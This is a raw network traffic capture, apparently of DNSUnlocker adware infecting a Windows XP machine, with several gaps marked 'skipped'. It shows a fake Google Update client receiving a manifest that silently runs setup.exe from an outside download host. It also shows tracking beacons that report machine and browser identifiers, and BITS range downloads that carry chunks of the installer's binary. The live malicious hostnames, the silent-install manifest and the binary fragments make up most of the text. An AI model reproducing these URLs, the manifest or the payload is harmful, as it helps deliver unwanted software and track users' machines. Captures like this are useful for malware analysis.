status="ok"/>. </app>.</response>.....
<<< skipped >>>
GET /omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720 HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp
X-Last-HR: 0x8004219c
X-Last-HTTP-Status-Code: 412
X-Retry-Count: 0
Host: update.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:22 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1454605844"
Last-Modified: Thu, 04 Feb 2016 17:10:44 GMT
Cache-Control: max-age=21600
Content-Length: 993
Content-Type: text/xml; charset=UTF-8
X-HW: 1456422142.dop001.fr7.t,1456422142.cds029.fr7.c
<?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="prod">. <daystart elapsed_seconds="56508"/>. <app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">. <updatecheck status="noupdate"/>. <ping status="ok"/>. </app>. <app appid="{84f03351-931d-41a5-a53d-6b5a7a5a2c96}" status="ok">. <updatecheck status="ok">. <urls>. <url codebase="hXXp://cdn.roastfiles2017.com/download/66/60001/DNSUnlocker/"/>. </urls>. <manifest version="1.3.25.36">. <packages>. <package hash="Gf6XxEvl3JcorzFhctEtWsC2muE=" name="setup.exe" required="true" size="1141502"/>. </packages>. <actions>. <action arguments="/verysilent" event="update" run="setup.exe" />. <action version="1.3.25.36" event="postinstall" onsuccess="exitsilentlyonlaunchcmd"/>. </actions>. </manifest>. </updatecheck>. <ping status="ok"/>. </app>.</response>...
GET /monetization.gif?event=4&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&iep=1&chp=na&ffp=na&browser=ie,de,te,tc&rnd=1456422014 HTTP/1.1
Host: logs.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:39 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1456422159.dop016.fr7.t,1456422159.cds050.fr7.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Thu, 25 Feb 2016 17:42:39 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1456422159.dop016.fr7.t,1456422159.cds050.fr7.c..GIF89a.............,...........D..;..
GET /installer.gif?action=started&app=64755&appver=0&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=4&rnd=1456422018 HTTP/1.1
Host: stats.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: V0yDluovbLZtnr7Y6CIR Wdf7aIxX8ZHAIVIseurioi9mWcKXBUm8YZX2amA/yEyFw3WnHABxsA=
x-amz-request-id: 7A4D6F935DEEF740
Date: Thu, 25 Feb 2016 17:42:16 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:06:34 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: V0yDluovbLZtnr7Y6CIR Wdf7aIxX8ZHAIVIseurioi9mWcKXBUm8YZX2amA/yEyFw3WnHABxsA=..x-amz-request-id: 7A4D6F935DEEF740..Date: Thu, 25 Feb 2016 17:42:16 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 25 Feb 2014 00:06:34 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /apps.gif?action=update&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422032&lifetime=18&oldappver=43&oldbgver=1&oldpluginsver=37&rnd=8700 HTTP/1.1
Accept: */*
Host: stats.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: R2kGtHheD445mnN2QeE/oa2yCwQPig4tg lFCvpKQKKpNEGu/O4z6MoWArb3gr24gUxPs7BiJBg=
x-amz-request-id: F56AE9D950BAAAD1
Date: Thu, 25 Feb 2016 17:42:30 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:06:25 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: R2kGtHheD445mnN2QeE/oa2yCwQPig4tg lFCvpKQKKpNEGu/O4z6MoWArb3gr24gUxPs7BiJBg=..x-amz-request-id: F56AE9D950BAAAD1..Date: Thu, 25 Feb 2016 17:42:30 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 25 Feb 2014 00:06:25 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /installer.gif?action=finished&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1456422014&procruntime=28&rnd=1456422042 HTTP/1.1
Host: stats.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: x3E G/Ql8kPOuBCrZ40b2DJUuNe1 KVwbRZXADv5q2NM6mMk UHrkOxzeTK8rxmmglzTyttzfUU=
x-amz-request-id: 85C0F7272F6CE521
Date: Thu, 25 Feb 2016 17:42:40 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:06:34 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /apps.gif?action=install&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&installtime=1456422014&lifetime=0&silent=1&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=28&rnd=1456422042 HTTP/1.1
Host: stats.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: I4M97BWeFobzd4oQMIcVVKifrL9B 5IbSZiu2uYS3lzBXvuIua9Ls1Niy0Ao3rSxjT31TxSvduc=
x-amz-request-id: DCE50181449CA089
Date: Thu, 25 Feb 2016 17:42:40 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:06:25 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: I4M97BWeFobzd4oQMIcVVKifrL9B 5IbSZiu2uYS3lzBXvuIua9Ls1Niy0Ao3rSxjT31TxSvduc=..x-amz-request-id: DCE50181449CA089..Date: Thu, 25 Feb 2016 17:42:40 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 25 Feb 2014 00:06:25 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=0-5444
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:33 GMT
Via: 1.1 varnish
Age: 1601
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 976
X-Timer: S1456422153.287588,VS0,VE0
Content-Range: bytes 0-5444/1153385
Content-Length: 5445
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................@...............................................t...........=...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....=.......>...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=5445-13791
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:37 GMT
Via: 1.1 varnish
Age: 1605
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 983
X-Timer: S1456422157.750239,VS0,VE0
Content-Range: bytes 5445-13791/1153385
Content-Length: 8347
.E.P...Q..E.P...Q.;.}..E.....j...........j...S.~...j....u...j#...l...V.E..t;....u.Sj...,........E.V.E..E......k8..W.\0..a8...\8..E.f.M.PS.u..}..E.f.M... ...E.P..`q@...........=....t.h.. .j.S.&8..P..0........~.......B..h...3.3.;.t.S......U...;.t.j........9].t.j".......j......PSWV.. q@..?...j..E.!N~......j....x...j..E..n...Ph.....E.VP.u.W..$q@...;E..o...9].u j..M.....;.......j3.2...PV...p@.V.....p@...j"......M....QP.u......P.B.....;........Y...P......u....E.j..E......j..E.......M.SQ....B....SQSSSPW.E....... p@.....<.........@.u.j#.....W..6..@...u.j..f...V...@.X...u.h....WS.u......PW.u.S.u..u....p@...u..]..u......h.....G...j3...4...;..........M..E.....Q.M.VQSPW...p@.3.A..u4.}..t.9M.t..}..u#.E..E..E...0.q.63.9].V....E..L5...\...M..Uh.........j........;.........9].......M.t.QVPW...p@...SSS.M.SQVPW...p@...............W...p@......8.......V..4..P.....j..S....u..u.P.42...........P.....9].t.j.........@.3.@..j......P.A5..8...s....M.SQPh..@.V..4..P..(q@......j..]..........E...o........;.~..M.8.......V.]..J4..9]..E.~}.u..E.SP.E.j.P.u...,q@...te.}..u_9].u!.}..t .}..t%.E...>F:..E.t@;u.|..9..E.PW..3........E.8E.t.<.t.<.u...>F..j.Sj..u...4q@....u...>;......8........u.Sj......PV..3..P..4q@.9]........7...8.......V.{3..P..8q@..w...8.t...\...PW.^3..P..<q@...u?.E........M...j........\...QP..@q@....u......E......#...PW..2........PV.5...j..E.f....l.....V.u........u.j..V...V..0..j.h...@V.00......E........t.B..5.q@.Pj@.E.....;.t{S......u.W......u.j@....;..u.t4.u.VS.u..W........F....Q..VP.M.../...u.8.u..u....p@..E.SP
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=13792-25330
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:40 GMT
Via: 1.1 varnish
Age: 1608
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 990
X-Timer: S1456422160.842481,VS0,VE0
Content-Range: bytes 13792-25330/1153385
Content-Length: 11539
....u......V.u..u......^]...U....H...B.SV.E..p<.@8.......B..}.....W.E......u.VS.}...V.4....}.....ur.}.SW..,r@.V.E........t.V.2.....u.V.....V.=8.B..u....q@..E..p4j.W.5....E..p0j.W.'....u..T...j..........n...j..u....}.............E.;.u..M....f......A....E.....=..........j.3.Y.}..u....E....B.h..B..E..}..E.1E@..u.......E..E.P.E.A.....Tq@...tVP..xr@.V......p.B.........t(...DC.u Pj......W...B.W...p@...t.WV.........B.VS.u..#......E......}.....t..}.......u....e...e..VS.....V.$.....u..E........B.VW.9...3.S.S...;..E.t53.;.t-.E.P.E.P.E.PW.U...ul..t.f!.W.=.....K;.f..\.u.3.VW.....W.o...;.t.. ..E.P.E.P.E.P.E.PW...p@...t:.E........E.V.u.P..0q@....E...... .}..E.........E.....3....}......j......9].t.;.s..E.......<.B.9Y.t Pj.h.........9].t.Wj.V.......h..B.V.u.......E.;....B.u.j..#....E..E..p.t..].3.9]....P.....9].u.9...B.u..{.......B..u..u..u......_^[....U...}..V.5Dr@.u..u.h.....c....u.j.hf....u....}..u-.u..u...Pq@...t.j........u.@..3.Pj.he....u...3.^]...U....@SV.u.Wj......._j.[s.j._j.[......s.j.3.[..33..s.3...@j...Y......E.j.P.H...P.E.SP.=...P..%......j.3........Y......RVh..@....B..u.V.....V.........W...r@....V.u..58.B..f..._^[........B.....B.3...t.V.A..t..t$..........Ju.^...U....8V.5Dr@.W.}.j.j.h....W...}..t<...q@...........E..E.PW.M...pq@..E.Pj.h....W...E.fu.......E..E..E.Pj.h....W.E........E._^....U....PSV.5,r@.Wh.....u...h.....E..u.......B..5Dr@..E..p.B......3..}......]..E..."....E.j....B....B.[.}....Pj@.]....q@.jn...B..5`.B....q@.....B..h.L@.j..E..u...0r@.Wj.j!j.j....B...4p@.h.......B..u.P..(p@..5..B.Sh.....u...WW
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=25331-36869
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:42 GMT
Via: 1.1 varnish
Age: 1610
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 996
X-Timer: S1456422162.138030,VS0,VE0
Content-Range: bytes 25331-36869/1153385
Content-Length: 11539
.Zy..>y..0y.."y...y...x...x...x...x...x...x..|x..`x..Tx..Hx...w..6x..*x...x...x...w...z...................................}...}...}...~...~..,~..<~..N~..^~..l~..~~...~...~...~...~...~...~...~...~.......}..4...F...T...f...z.......................R}..<}..0}...}...}...|...|...|...|...}...}...}..~}..r}..$...b}...|...|...|..||..t|..d|..R|..B|..0|.."|...|...|...{...{...|......v...`...N.......4...$...............RichEdit....RichEdit20A.RichEd32....RichEd20.....DEFAULT\Control Panel\International....Control Panel\Desktop\ResourceLocale....[Rename]....%d..Software\Microsoft\Windows\CurrentVersion...\Microsoft\Internet Explorer\Quick Launch.......................................................#. .3.;.C.S.c.s...........................................................................p.p.......................!.1.A.a.......................... .0.@.`...........................................................................F...............F...............F.u...........{..`p...v..............lq...u..........v...<p...v..............Pq..du...............p...u..............(p...w..........D...xr...w..............hr......................,...@...................r...d...R...........................h...X...H...2........................y...y...y...y...y...y...y...z.. z..4z..Jz..Rz..bz..pz...z...z...z...z...y...z...z...z...{...{...{..>{..L{..\{..n{...{...{...{...{...{...{..ry..fy..Zy..>y..0y.."y...y...x...x...x...x...x...x..|x..`x..Tx..Hx...w..6x..*x...x...x...w...z...................................}...}...}...~...
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=36870-60156
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:43 GMT
Via: 1.1 varnish
Age: 1611
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 999
X-Timer: S1456422163.281776,VS0,VE0
Content-Range: bytes 36870-60156/1153385
Content-Length: 23287
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................_.............................................V.............................................QS`.............%..............................RST..........S;..............S.................QOTh.........P;??..............U...............QOK`.........P;?@@?..............S..............#J^`........P;?@@@@?..............U............"IK`h........DdEBA@@@@=............SU..........$.JLh........cgg..jEA>..<...........SO...........HK^h...............eE...............OU........%.FJ^h................j...............SI..........FJ]b................e...............SOU......%..'M]b................e..............._OI......$.(*MXob...............................VP ........(3W\a..........hpppiffT..............VPIU......)25[n.................................ZPI ......07km..................................ZPI ......678...................................ZP......./6~..................................aZXJ........6~8...........................a.ZaZaZXKJ........679m.............................Z_ZT_PI....
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=60157-106798
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:44 GMT
Via: 1.1 varnish
Age: 1612
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 1000
X-Timer: S1456422164.355846,VS0,VE0
Content-Range: bytes 60157-106798/1153385
Content-Length: 46642
.A/...\..Ys..kH]...?]v..R.r..7.....kS..nH......*R...E...<81M.c.m...uC....y............~...........{..u...~.o..=...{.E........vj.[.w.u?..<....n2...L..y.JO;h...dN2....L...|k0ZN<4......).d....)....\l..<..y._....x.,....7m.......~..1.4i....='.b..p.Y..?.{.J/~.~.'...*.yRM....-..{..t.5.......&..../..6.....M...R..;_..e..~Bcl.}.14.....e...92z.)....~... 0....?...|..U.7..|.[..TY6\..f.........I...O}...j.b...?u.{Ak.yJ..w...)oJk.eJ..7..*.u..[..X..c....5..m5.T...j..t.(.f.....VYM....Q.E1=.|W.>F.S..{jJ.s..y.-..K..CN.So..V.....Y..B.:..u;.mx..G.)....E/............Z.....-.Y.(.....5.......,K.....?.s.....uP.....$;._!...YM.*.{...........E..........J....g...m.A....}.,...jq.L...i29E&/..Sd.K&.....l.....v..5..'....k.vxi....C...7c...c.L..0O......{c..&,tS...36..>.........g.oN>I.E.X.S.5...U.a....Tg.Y...fd.T.........w.s*0.....j..h..:..(J.i...W.o..{..In....=)..FY......45N1.....C.........6......1....Y&.jr>M....a...b..;.M...g.p..........o.1.w'....N...1P.TK\.]J...Y".(.U$...[....N.W..9..1.N.x.... >.n..G.\.9]L...{E.....~. j.h.$......juu...7....... .'.s47...>Y<....F.Xc..i>....F.T[.._....2...d..5..BK&M..&..*qz.6GVcg...b.d7XM_8...;^)..!......m.>....z8....NT.~yj7...3...v....x...G.j...E.V...oN.1.....6.....q.2...#.....<..-6....}.}..=@}.@....9i4E.....1m.qe..[....l..d~........N..'j.S.is....r...M..xS.=.kd../w.s..#....kY...F.w...._t.4..&[..(%@U...-.J.l..a....j.......&...Mf.D.ib...=_.>w...........y.....bEm...A9..l...'.a4..[.S...1}o..I.{X.....n.q&.bG.......M.b.S..."....^..`;!.].z.=f.y.#b..{....h[<5.....0P9R....?m
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=106799-199361
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:45 GMT
Via: 1.1 varnish
Age: 1613
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 1004
X-Timer: S1456422165.419858,VS0,VE0
Content-Range: bytes 106799-199361/1153385
Content-Length: 92563
P...2....h..`Juy......Z.z...\o...t.G.W.........S.9..{..oH3.E........~.[q..b...3(..^PteU.....`d....8.......>.W..._.;..|. &R..!..3.....x.\.^h.%...........(.w....z......du-)...$=9f..Av!...T...P.\2Yl..Ez u..A..f..N......oxq,A.b0*...M..#.......n_>..F..t..8..l........:J.r...=U2XH7.B.ns..[.i........C..FH.Q.........E1q.?..f.@.3.......rk..?....Yi.Ux.3...J.@ .. ._%'.V...t..7.".e.]9.J....%h.8.gJ\..hQ......@.n...CH..........R.w._...._..._B.X....<........[..A..-.%.....l..bv.....k......x..!...w.....W&m.....G|"3....[.~7...e.-.b<...Ao.mS..p..6.dQ).....o...}i.t\.U...(..}.........x.jv9.8.c8.O?!Y]N.c.......aZ..... .....0..Lb:k.x..v}<.~.z.d.......H...C.yU9..S............y....=.....U.*.....i.....i&..S...{..s...j..Q..!.....@.,)...P.@ ....%_.k....&{..d.W....d..&i.7......}.k...2........^.]..{.,O.sN.#D......=...T.)......'...$..o.%W..Zr...kQ......G.L...o:0 ......?..M.h.c=......h...7?`|..F...7.............{u/z.gYI.z.sy6..b......*.$..Mr8.CO>.'K..H.d.D.\.TR.u"=....'Aq.A.8.5......G@q|.]..@...P.A.9.P..Z..k.B..v..,.@...)......S-.......T...g3.n....w*.`.V..<N.7kO_.)...N.L...)l1..neAU...s .w....$Z.=.m_....../..).&.....9>....p.l.Cn....d:.7.."..A.s..$.. ..p..^...s.A..._1..../..k.~.U..tT.y`Ev5E./.V..>...M..D..!..d.@..F......M..[..&....}..IO..~_O....a...../....(.0....PX.A.x..{.<..h.......a......=S..Bbv.<..L.%-Kn.XL.2.7.K.?...<.........3@..Q"..M.HP...@..r.pIP.`E:..".HP..I..a.*VTZo.z.-m..EL.$......X..1X......[k.s..%(.........\.Y{....{.u.Nt...........0}...\]1.....c...xf.....l..i...B.- .....Y....C...h.R..z..&..l.u..{.
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=199362-382774
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:46 GMT
Via: 1.1 varnish
Age: 1614
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 1007
X-Timer: S1456422166.481635,VS0,VE0
Content-Range: bytes 199362-382774/1153385
Content-Length: 183413
=.k-..X..m.e....q...<.n.. ..'g%0.O.........."....G....E..]Cf!.2Z.q.......=0.....D......).i..4-...@. ..;.....kw{.......&.Z.].O6......O...GYf.$.i.<u.....3!.z5.I......K.,............K..*.nH...$..eV...(z...n.\3V.~.V./.(.......9.D..h...h.N.EI...pW......6..~V|`nL.,.....!-....Y.1.V...j......K.....D......8@.@v.#.......$..(..W.pb..T.7..C.4.........f....Z.~G.m`.8J...j.-;....;....S..{....wY..S.l8'...6p..d.m.....,Y@I.Y..Z...).y.#...s..,R...,H...O.H.,.K....)~C..<2..#,'.....B#..!B..."..D..g.Z.......V..5. z..q...Y.....-=.....SdXP.....E.f,u.\Ql.2....r.(2}.yI....t...p......fHQ.......d.....{.2m1.......o;Y.g.hC......G%.........Z...m..6.....l...8.7Pr[.g.a.>.9..=...>r...\FS.t...m.Jz}....\y...V^ra3.......}.......x.a...(Z.r.C..pE'..i...9..Nu1.bK.G...-.U.irpz.!2.(_E..<. ..D`Q.VL....R.i.-Lp9H.s...N...sY.{$4.Z*U....P.D./G`.H.KF...;.....e..!.Z..........nO.b.u..66x G.Q.w.J.c,..l......p?..5.3..X.....uF.H..yh...........x.x14...p...W9...P.O.T.@s..%..ko...k.{s .(P..%..X..I.Q..F.E.'&]..k........2"c.....9..J.f..&.5..:D..g.j...uD\..5. .M...f3^.p.>A..C^Q.._A....A.A.g.......!..i&..<q....n.C.4..*zj......NM.8l..8<R.....Wc..0..O..S\.....|a....X.#.....S....D#..z....%..x.....#..Z.3..~D...lJ.......~".C..8....!I.I..1.&.?...63X.6.!.n..GH.|.b.q."p..v.....Tj...?..uKl..J.@.cj.#...5.f.........f4..{V..GaF.%({o.C`..f,...8T.....:.B8...x.....].........{....`...'..4:.f:6-.V.T[...h..r.SJ8......f.,....o.....3..r.S....`..N.3.'(.D...q.;..j.Z.{2...X..A..._...%..m.r...L#X)...l..B'....@......{../..0h...N.0.1(.!.IA2.g$.#.S*.&'w...c..X\.a=.m...."
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=382775-754213
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
